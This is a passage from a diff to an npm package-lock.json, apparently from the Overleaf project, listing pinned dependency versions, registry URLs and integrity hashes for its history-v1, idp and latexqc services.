}, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/history-v1/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "services/history-v1/node_modules/test-value": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/test-value/-/test-value-2.1.0.tgz", + "integrity": "sha1-Edpv9nDzRxpztiXKTz/c97t0gpE=", + "dependencies": { + "array-back": "^1.0.3", + "typical": "^2.6.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "services/history-v1/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "services/history-v1/node_modules/yocto-queue": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-1.1.1.tgz", + "integrity": "sha512-b4JR1PFR10y1mKjhHY9LaGo6tmrgjit7hxVIeAmyMw3jegXR4dhYqLaQF5zMXZxY7tLpMyJeLjr1C4rLmkVe8g==", + "license": "MIT", + "engines": { + "node": ">=12.20" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/idp": { + "name": "@overleaf/idp", + "dependencies": { + "ejs": "^3.1.10", + "express": "^4.21.2", + "samlp": "^7.0.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "services/latexqc": { + "version": "0.0.1", + "license": "MIT", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/o-error": "*", + "aws-sdk": "^2.1174.0", + "body-parser": "^1.20.3", + "bootstrap": "^5.3.3", + "compression": "^1.7.1", + "cookie-parser": "^1.4.6", + "cross-env": "^4.0.0", + "es6-promise": "^4.2.8", + "express": "^4.21.2", + "express-basic-auth": "^1.2.0", + "express-flash": "0.0.2", + "express-rate-limit": "^2.11.0", + "helmet": "^7.1.0", + "jquery": "^3.7.1", + "jsonwebtoken": "^9.0.2", + "method-override": "^2.3.10", + "prop-types": "^15.8.1", + "react": "^17.0.2", + "react-cookie": "^7.2.0", + "react-dom": "^17.0.2", + "react-dropzone": "^14.2.3", + "react-helmet": "^6.1.0", + "react-redux": "^7.2.2", + "react-responsive": "^10.0.0", + "react-router-dom": "^6.26.1", + "redux": "^4.2.1", + "redux-logger": "^3.0.1", + "redux-thunk": "~2.2.0", + "source-map-support": "^0.5.12", + "throng": "^4.0.0" + }, + "devDependencies": { + "@babel/core": "^7.25.2", + "@babel/plugin-syntax-import-meta": "^7.10.4", + "@babel/plugin-transform-object-assign": "^7.22.5", + "@babel/plugin-transform-react-constant-elements": "^7.22.5", + "@babel/plugin-transform-react-inline-elements": "^7.22.5", + "@babel/polyfill": "^7.12.1", + "@babel/preset-env": "^7.25.3", + "@babel/preset-react": "^7.24.7", + "@babel/register": "^7.24.6", + "@testing-library/react": "^12.1.5", + "babel-loader": "^9.1.3", + "babel-plugin-react-transform": "^2.0.2", + "babel-plugin-transform-react-remove-prop-types": "^0.3.3", + "chai": "^4.3.10", + "chai-as-promised": "^7.1.1", + "css-loader": "^6.8.1", + "cssnano": "^6.0.0", + "eslint": "^7.21.0", + "eslint-config-prettier": "^8.5.0", + "eslint-config-standard": "^16.0.3", + "eslint-plugin-react": "^7.32.2", + "eslint-plugin-unicorn": "^56.0.0", + "expect": "^1.15.2", + "file-loader": "^6.2.0", + "jsdom": "^20.0.0", + "mini-css-extract-plugin": "^2.7.6", + "mocha": "^11.1.0", + "nodemon": "^3.0.1", + "postcss": "^8.4.31", + "postcss-import": "^15.1.0", + "postcss-loader": "^7.3.0", + "postcss-preset-env": "^8.3.2", + "postcss-reporter": "^7.0.5", + "react-transform-hmr": "^1.0.4", + "redux-mock-store": "1.5.0", + "sandboxed-module": "^2.0.4", + "sinon": "^19.0.2", + "sinon-chai": "^3.7.0", + "style-loader": "^3.3.3", + "url-loader": "^4.1.1", + "webpack": "^5.98.0", + "webpack-cli": "^5.1.4", + "webpack-dev-middleware": "^6.1.2", + "webpack-hot-middleware": "^2.25.1", + "webpack-manifest-plugin": "^5.0.0" + }, + "engines": { + "node": ">=18" + } + }, + "services/latexqc/node_modules/@babel/code-frame": { + "version": "7.12.11", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.12.11.tgz", + "integrity": "sha512-Zt1yodBx1UcyiePMSkWnU4hPqhwq7hGi2nFL1LeA3EUl+q2LQx16MISgJ0+z7dnmgvP9QtIleuETGOiOH1RcIw==", + "dev": true, + "dependencies": { + "@babel/highlight": "^7.10.4" + } + }, + "services/latexqc/node_modules/@eslint/eslintrc": { + "version": "0.4.3", + "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-0.4.3.tgz", + "integrity": "sha512-J6KFFz5QCYUJq3pf0mjEcCJVERbzv71PUIDczuh9JkwGEzced6CO5ADLHB1rbf/+oPBtoPfMYNOpGDzCANlbXw==", + "dev": true, + "dependencies": { + "ajv": "^6.12.4", + "debug": "^4.1.1", + "espree": "^7.3.0", + "globals": "^13.9.0", + "ignore": "^4.0.6", + "import-fresh": "^3.2.1", + "js-yaml": "^3.13.1", + "minimatch": "^3.0.4", + "strip-json-comments": "^3.1.1" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "services/latexqc/node_modules/@humanwhocodes/config-array": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.5.0.tgz", + "integrity": "sha512-FagtKFz74XrTl7y6HCzQpwDfXP0yhxe9lHLD1UZxjvZIcbyRz8zTFF/yYNfSfzU414eDwZ1SrO0Qvtyf+wFMQg==", + "deprecated": "Use @eslint/config-array instead", + "dev": true, + "dependencies": { + "@humanwhocodes/object-schema": "^1.2.0", + "debug": "^4.1.1", + "minimatch": "^3.0.4" + }, + "engines": { + "node": ">=10.10.0" + } + }, + "services/latexqc/node_modules/@sinonjs/commons": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", + "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", + "dev": true, + "dependencies": { + "type-detect": "4.0.8" + } + }, + "services/latexqc/node_modules/@sinonjs/commons/node_modules/type-detect": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", + "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/@sinonjs/fake-timers": { + "version": "13.0.2", + "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-13.0.2.tgz", + "integrity": "sha512-4Bb+oqXZTSTZ1q27Izly9lv8B9dlV61CROxPiVtywwzv5SnytJqhvYe6FclHYuXml4cd1VHPo1zd5PmTeJozvA==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^3.0.1" + } + }, + "services/latexqc/node_modules/@sinonjs/samsam": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/@sinonjs/samsam/-/samsam-8.0.2.tgz", + "integrity": "sha512-v46t/fwnhejRSFTGqbpn9u+LQ9xJDse10gNnPgAcxgdoCDMXj/G2asWAC/8Qs+BAZDicX+MNZouXT1A7c83kVw==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^3.0.1", + "lodash.get": "^4.4.2", + "type-detect": "^4.1.0" + } + }, + "services/latexqc/node_modules/@sinonjs/text-encoding": { + "version": "0.7.3", + "resolved": "https://registry.npmjs.org/@sinonjs/text-encoding/-/text-encoding-0.7.3.tgz", + "integrity": "sha512-DE427ROAphMQzU4ENbliGYrBSYPXF+TtLg9S8vzeA+OF4ZKzoDdzfL8sxuMUGS/lgRhM6j1URSk9ghf7Xo1tyA==", + "dev": true + }, + "services/latexqc/node_modules/@types/hoist-non-react-statics": { + "version": "3.3.5", + "resolved": "https://registry.npmjs.org/@types/hoist-non-react-statics/-/hoist-non-react-statics-3.3.5.tgz", + "integrity": "sha512-SbcrWzkKBw2cdwRTwQAswfpB9g9LJWfjtUeW/jvNwbhC8cpmmNYVePa+ncbUe0rGTQ7G3Ff6mYUN2VMfLVr+Sg==", + "dependencies": { + "@types/react": "*", + "hoist-non-react-statics": "^3.3.0" + } + }, + "services/latexqc/node_modules/acorn-globals": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/acorn-globals/-/acorn-globals-7.0.1.tgz", + "integrity": "sha512-umOSDSDrfHbTNPuNpC2NSnnA3LUrqpevPb4T9jRx4MagXNS0rs+gwiTcAvqCRmsD6utzsrzNt+ebm00SNWiC3Q==", + "dev": true, + "dependencies": { + "acorn": "^8.1.0", + "acorn-walk": "^8.0.2" + } + }, + "services/latexqc/node_modules/acorn-globals/node_modules/acorn": { + "version": "8.12.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.12.1.tgz", + "integrity": "sha512-tcpGyI9zbizT9JbV6oYE477V6mTlXvvi0T0G3SNIYE2apm/G5huBa1+K89VGeovbg+jycCrfhl3ADxErOuO6Jg==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/latexqc/node_modules/acorn-walk": { + "version": "8.3.3", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-8.3.3.tgz", + "integrity": "sha512-MxXdReSRhGO7VlFe1bRG/oI7/mdLV9B9JJT0N8vZOhF7gFRR5l3M8W9G8JxmKV+JC5mGqJ0QvqfSOLsCPa4nUw==", + "dev": true, + "dependencies": { + "acorn": "^8.11.0" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/latexqc/node_modules/acorn-walk/node_modules/acorn": { + "version": "8.12.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.12.1.tgz", + "integrity": "sha512-tcpGyI9zbizT9JbV6oYE477V6mTlXvvi0T0G3SNIYE2apm/G5huBa1+K89VGeovbg+jycCrfhl3ADxErOuO6Jg==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/latexqc/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "services/latexqc/node_modules/argparse": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", + "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "dev": true, + "dependencies": { + "sprintf-js": "~1.0.2" + } + }, + "services/latexqc/node_modules/attr-accept": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/attr-accept/-/attr-accept-2.2.2.tgz", + "integrity": "sha512-7prDjvt9HmqiZ0cl5CRjtS84sEyhsHP2coDkaZKRKVfCDo9s7iw7ChVmar78Gu9pC4SoR/28wFu/G5JJhTnqEg==", + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/bootstrap": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/bootstrap/-/bootstrap-5.3.3.tgz", + "integrity": "sha512-8HLCdWgyoMguSO9o+aH+iuZ+aht+mzW0u3HIMzVu7Srrpv7EBBxTnrFlSCskwdY1+EOFQSm7uMJhNQHkdPcmjg==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/twbs" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/bootstrap" + } + ], + "license": "MIT", + "peerDependencies": { + "@popperjs/core": "^2.11.8" + } + }, + "services/latexqc/node_modules/chai": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/chai/-/chai-4.5.0.tgz", + "integrity": "sha512-RITGBfijLkBddZvnn8jdqoTypxvqbOLYQkGGxXzeFjVHvudaPw0HNFD9x928/eUwYWd2dPCugVqspGALTZZQKw==", + "dev": true, + "dependencies": { + "assertion-error": "^1.1.0", + "check-error": "^1.0.3", + "deep-eql": "^4.1.3", + "get-func-name": "^2.0.2", + "loupe": "^2.3.6", + "pathval": "^1.1.1", + "type-detect": "^4.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "services/latexqc/node_modules/cookie": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.6.0.tgz", + "integrity": "sha512-U71cyTamuh1CRNCfpGY6to28lxvNwPG4Guz/EVjgf3Jmzv0vlDp1atT9eS5dDjMYHucpHbWns6Lwf3BKz6svdw==", + "engines": { + "node": ">= 0.6" + } + }, + "services/latexqc/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "services/latexqc/node_modules/debug/node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true, + "license": "MIT" + }, + "services/latexqc/node_modules/deep-eql": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-4.1.4.tgz", + "integrity": "sha512-SUwdGfqdKOwxCPeVYjwSyRpJ7Z+fhpwIAtmCUdZIWZ/YP5R9WAsyuSgpLVDi9bjWoN2LXHNss/dk3urXtdQxGg==", + "dev": true, + "dependencies": { + "type-detect": "^4.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "services/latexqc/node_modules/diff": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/diff/-/diff-7.0.0.tgz", + "integrity": "sha512-PJWHUb1RFevKCwaFA9RlG5tCd+FO5iRh9A8HEtkmBH2Li03iJriB6m6JIN4rGz3K3JLawI7/veA1xzRKP6ISBw==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/latexqc/node_modules/entities": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", + "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", + "dev": true, + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "services/latexqc/node_modules/eslint": { + "version": "7.32.0", + "resolved": "https://registry.npmjs.org/eslint/-/eslint-7.32.0.tgz", + "integrity": "sha512-VHZ8gX+EDfz+97jGcgyGCyRia/dPOd6Xh9yPv8Bl1+SoaIwD+a/vlrOmGRUyOYu7MwUhc7CxqeaDZU13S4+EpA==", + "dev": true, + "dependencies": { + "@babel/code-frame": "7.12.11", + "@eslint/eslintrc": "^0.4.3", + "@humanwhocodes/config-array": "^0.5.0", + "ajv": "^6.10.0", + "chalk": "^4.0.0", + "cross-spawn": "^7.0.2", + "debug": "^4.0.1", + "doctrine": "^3.0.0", + "enquirer": "^2.3.5", + "escape-string-regexp": "^4.0.0", + "eslint-scope": "^5.1.1", + "eslint-utils": "^2.1.0", + "eslint-visitor-keys": "^2.0.0", + "espree": "^7.3.1", + "esquery": "^1.4.0", + "esutils": "^2.0.2", + "fast-deep-equal": "^3.1.3", + "file-entry-cache": "^6.0.1", + "functional-red-black-tree": "^1.0.1", + "glob-parent": "^5.1.2", + "globals": "^13.6.0", + "ignore": "^4.0.6", + "import-fresh": "^3.0.0", + "imurmurhash": "^0.1.4", + "is-glob": "^4.0.0", + "js-yaml": "^3.13.1", + "json-stable-stringify-without-jsonify": "^1.0.1", + "levn": "^0.4.1", + "lodash.merge": "^4.6.2", + "minimatch": "^3.0.4", + "natural-compare": "^1.4.0", + "optionator": "^0.9.1", + "progress": "^2.0.0", + "regexpp": "^3.1.0", + "semver": "^7.2.1", + "strip-ansi": "^6.0.0", + "strip-json-comments": "^3.1.0", + "table": "^6.0.9", + "text-table": "^0.2.0", + "v8-compile-cache": "^2.0.3" + }, + "bin": { + "eslint": "bin/eslint.js" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "services/latexqc/node_modules/eslint-config-standard": { + "version": "16.0.3", + "resolved": "https://registry.npmjs.org/eslint-config-standard/-/eslint-config-standard-16.0.3.tgz", + "integrity": "sha512-x4fmJL5hGqNJKGHSjnLdgA6U6h1YW/G2dW9fA+cyVur4SK6lyue8+UgNKWlZtUDTXvgKDD/Oa3GQjmB5kjtVvg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "peerDependencies": { + "eslint": "^7.12.1", + "eslint-plugin-import": "^2.22.1", + "eslint-plugin-node": "^11.1.0", + "eslint-plugin-promise": "^4.2.1 || ^5.0.0" + } + }, + "services/latexqc/node_modules/eslint-plugin-promise": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-promise/-/eslint-plugin-promise-5.2.0.tgz", + "integrity": "sha512-SftLb1pUG01QYq2A/hGAWfDRXqYD82zE7j7TopDOyNdU+7SvvoXREls/+PRTY17vUXzXnZA/zfnyKgRH6x4JJw==", + "dev": true, + "peer": true, + "engines": { + "node": "^10.12.0 || >=12.0.0" + }, + "peerDependencies": { + "eslint": "^7.0.0" + } + }, + "services/latexqc/node_modules/espree": { + "version": "7.3.1", + "resolved": "https://registry.npmjs.org/espree/-/espree-7.3.1.tgz", + "integrity": "sha512-v3JCNCE64umkFpmkFGqzVKsOT0tN1Zr+ueqLZfpV1Ob8e+CEgPWa+OxCoGH3tnhimMKIaBm4m/vaRpJ/krRz2g==", + "dev": true, + "dependencies": { + "acorn": "^7.4.0", + "acorn-jsx": "^5.3.1", + "eslint-visitor-keys": "^1.3.0" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "services/latexqc/node_modules/espree/node_modules/eslint-visitor-keys": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", + "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/globals": { + "version": "13.24.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.24.0.tgz", + "integrity": "sha512-AhO5QUcj8llrbG09iWhPU2B204J1xnPeL8kQmVorSsy+Sjj1sk8gIyh6cUocGmH4L0UuhAJy+hJMRA4mgA4mFQ==", + "dev": true, + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/latexqc/node_modules/helmet": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/helmet/-/helmet-7.1.0.tgz", + "integrity": "sha512-g+HZqgfbpXdCkme/Cd/mZkV0aV3BZZZSugecH03kl38m/Kmdx8jKjBikpDj2cr+Iynv4KpYEviojNdTJActJAg==", + "engines": { + "node": ">=16.0.0" + } + }, + "services/latexqc/node_modules/https-proxy-agent": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", + "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "dev": true, + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "services/latexqc/node_modules/ignore": { + "version": "4.0.6", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-4.0.6.tgz", + "integrity": "sha512-cyFDKrqc/YdcWFniJhzI42+AzS+gNwmUzOSFcRCQYwySuBBBy/KjuxWLZ/FHEH6Moq1NizMOBWyTcv8O4OZIMg==", + "dev": true, + "engines": { + "node": ">= 4" + } + }, + "services/latexqc/node_modules/js-yaml": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", + "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "dev": true, + "dependencies": { + "argparse": "^1.0.7", + "esprima": "^4.0.0" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "services/latexqc/node_modules/jsdom": { + "version": "20.0.3", + "resolved": "https://registry.npmjs.org/jsdom/-/jsdom-20.0.3.tgz", + "integrity": "sha512-SYhBvTh89tTfCD/CRdSOm13mOBa42iTaTyfyEWBdKcGdPxPtLFBXuHR8XHb33YNYaP+lLbmSvBTsnoesCNJEsQ==", + "dev": true, + "dependencies": { + "abab": "^2.0.6", + "acorn": "^8.8.1", + "acorn-globals": "^7.0.0", + "cssom": "^0.5.0", + "cssstyle": "^2.3.0", + "data-urls": "^3.0.2", + "decimal.js": "^10.4.2", + "domexception": "^4.0.0", + "escodegen": "^2.0.0", + "form-data": "^4.0.0", + "html-encoding-sniffer": "^3.0.0", + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.1", + "is-potential-custom-element-name": "^1.0.1", + "nwsapi": "^2.2.2", + "parse5": "^7.1.1", + "saxes": "^6.0.0", + "symbol-tree": "^3.2.4", + "tough-cookie": "^4.1.2", + "w3c-xmlserializer": "^4.0.0", + "webidl-conversions": "^7.0.0", + "whatwg-encoding": "^2.0.0", + "whatwg-mimetype": "^3.0.0", + "whatwg-url": "^11.0.0", + "ws": "^8.11.0", + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "canvas": "^2.5.0" + }, + "peerDependenciesMeta": { + "canvas": { + "optional": true + } + } + }, + "services/latexqc/node_modules/jsdom/node_modules/acorn": { + "version": "8.12.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.12.1.tgz", + "integrity": "sha512-tcpGyI9zbizT9JbV6oYE477V6mTlXvvi0T0G3SNIYE2apm/G5huBa1+K89VGeovbg+jycCrfhl3ADxErOuO6Jg==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/latexqc/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "services/latexqc/node_modules/just-extend": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/just-extend/-/just-extend-6.2.0.tgz", + "integrity": "sha512-cYofQu2Xpom82S6qD778jBDpwvvy39s1l/hrYij2u9AMdQcGRpaBu6kY4mVhuno5kJVi1DAz4aiphA2WI1/OAw==", + "dev": true + }, + "services/latexqc/node_modules/method-override": { + "version": "2.3.10", + "resolved": "https://registry.npmjs.org/method-override/-/method-override-2.3.10.tgz", + "integrity": "sha512-Ks2/7e+3JuwQcpLybc6wTHyqg13HDjOhLcE+YaAEub9DbSxF+ieMvxUlybmWW9luRMh9Cd0rO9aNtzUT51xfNQ==", + "dependencies": { + "debug": "2.6.9", + "methods": "~1.1.2", + "parseurl": "~1.3.2", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "services/latexqc/node_modules/method-override/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "services/latexqc/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "services/latexqc/node_modules/nise": { + "version": "6.1.1", + "resolved": "https://registry.npmjs.org/nise/-/nise-6.1.1.tgz", + "integrity": "sha512-aMSAzLVY7LyeM60gvBS423nBmIPP+Wy7St7hsb+8/fc1HmeoHJfLO8CKse4u3BtOZvQLJghYPI2i/1WZrEj5/g==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^3.0.1", + "@sinonjs/fake-timers": "^13.0.1", + "@sinonjs/text-encoding": "^0.7.3", + "just-extend": "^6.2.0", + "path-to-regexp": "^8.1.0" + } + }, + "services/latexqc/node_modules/optionator": { + "version": "0.9.4", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.4.tgz", + "integrity": "sha512-6IpQ7mKUxRcZNLIObR0hz7lxsapSSIYNZJwXPGeF0mTVqGKFIXj1DQcMoT22S3ROcLyY/rz0PWaWZ9ayWmad9g==", + "dev": true, + "dependencies": { + "deep-is": "^0.1.3", + "fast-levenshtein": "^2.0.6", + "levn": "^0.4.1", + "prelude-ls": "^1.2.1", + "type-check": "^0.4.0", + "word-wrap": "^1.2.5" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "services/latexqc/node_modules/parse5": { + "version": "7.1.2", + "resolved": "https://registry.npmjs.org/parse5/-/parse5-7.1.2.tgz", + "integrity": "sha512-Czj1WaSVpaoj0wbhMzLmWD69anp2WH7FXMB9n1Sy8/ZFF9jolSQVMu1Ij5WIyGmcBmhk7EOndpO4mIpihVqAXw==", + "dev": true, + "dependencies": { + "entities": "^4.4.0" + }, + "funding": { + "url": "https://github.com/inikulin/parse5?sponsor=1" + } + }, + "services/latexqc/node_modules/path-to-regexp": { + "version": "8.2.0", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-8.2.0.tgz", + "integrity": "sha512-TdrF7fW9Rphjq4RjrW0Kp2AW0Ahwu9sRGTkS6bvDi0SCwZlEZYmcfDbEsTz8RVk0EHIS/Vd1bv3JhG+1xZuAyQ==", + "dev": true, + "engines": { + "node": ">=16" + } + }, + "services/latexqc/node_modules/react-cookie": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/react-cookie/-/react-cookie-7.2.0.tgz", + "integrity": "sha512-mqhPERUyfOljq5yJ4woDFI33bjEtigsl8JDJdPPeNhr0eSVZmBc/2Vdf8mFxOUktQxhxTR1T+uF0/FRTZyBEgw==", + "dependencies": { + "@types/hoist-non-react-statics": "^3.3.5", + "hoist-non-react-statics": "^3.3.2", + "universal-cookie": "^7.0.0" + }, + "peerDependencies": { + "react": ">= 16.3.0" + } + }, + "services/latexqc/node_modules/react-dropzone": { + "version": "14.2.3", + "resolved": "https://registry.npmjs.org/react-dropzone/-/react-dropzone-14.2.3.tgz", + "integrity": "sha512-O3om8I+PkFKbxCukfIR3QAGftYXDZfOE2N1mr/7qebQJHs7U+/RSL/9xomJNpRg9kM5h9soQSdf0Gc7OHF5Fug==", + "dependencies": { + "attr-accept": "^2.2.2", + "file-selector": "^0.6.0", + "prop-types": "^15.8.1" + }, + "engines": { + "node": ">= 10.13" + }, + "peerDependencies": { + "react": ">= 16.8 || 18.0.0" + } + }, + "services/latexqc/node_modules/react-fast-compare": { + "version": "3.2.2", + "resolved": 